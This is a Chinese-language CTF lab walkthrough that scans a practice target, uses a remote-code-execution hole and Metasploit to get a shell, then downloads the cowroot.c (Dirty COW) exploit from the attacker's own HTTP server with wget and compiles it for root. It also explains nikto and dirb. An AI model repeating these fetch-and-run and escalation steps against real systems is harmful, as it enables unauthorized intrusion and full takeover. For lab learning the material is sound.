CTF攻击及提权过程笔记
目标识别与扫描
- 启动靶机后,使用
arp-scan -l
扫描,发现靶机IP为192.168.80.155。 - 使用
nmap -p-
扫描常用端口,发现开放22和80端口。 - 通过Firefox访问80端口,输入用户名后点击”startthectf”.
漏洞扫描与利用
查看网页源代码无果后,使用
nikto
扫描,发现网站存在漏洞.nikto -h 192.168.80.155
根据提示替换网址后发现无法访问,重新使用
nmap
扫描,发现多出一个60080端口.发现网站转移到不同端口,尝试访问
/?page
页面.使用
dirb
工具扫描,发现一个后缀为mailer
的网页.dirb http://192.168.80.155/
查看源代码,发现一段注释,得知存在远程代码执行漏洞.
渗透与提权
- 使用Metasploit,修改参数并开启监听.
- 复制给出的指令到网址的
mail=
后,输入sessions
查看获取的shell. - 使用
sessions 1
连接shell,输入sysinfo
获取系统信息,然后使用shell -t
获得系统shell.
- 使用
wget
下载提权工具,如:cowroot.c. - 使用
python3 -m http.server 8081
开启Kali的HTTP服务. - 在目标机器上使用
wget http://192.168.80.154:8081/cowroot.c
下载提权工具. - 使用
gcc cowroot.c -o exp -pthread
编译提权工具. - 使用
chmod +x exp
给提权文件赋予执行权限. - 运行提权脚本:
./exp
.
- 最后,进入root目录,发现
flag.txt
,使用cat
命令获取flag.
这是攻击与提权的一般过程,务必在合法环境中进行此类操作,以免违反法律规定.
Nikto 工具:
定义: Nikto是一个开源的Web服务器扫描工具,用于发现Web服务器上的潜在安全问题。它可以帮助鉴定常见的安全漏洞,如不安全的配置、过时的软件版本等.
用法: nikto -h
-h
: 指定目标主机的IP地址或域名.
示例: nikto -h 192.168.80.155
Dirb 工具:
定义: Dirb是一个简单的目录爆破工具,用于枚举Web服务器上的目录和文件。它尝试发现隐藏在Web服务器中的目录结构,帮助识别潜在的敏感信息或漏洞.
用法: dirb
<target>
: 指定目标主机的URL.
示例: dirb http://192.168.80.155/
通过使用这两个工具,你可以更全面地扫描目标系统,识别可能的漏洞和目录结构。记住,在进行渗透测试时,务必获得授权,并仅在授权范围内使用这些工具。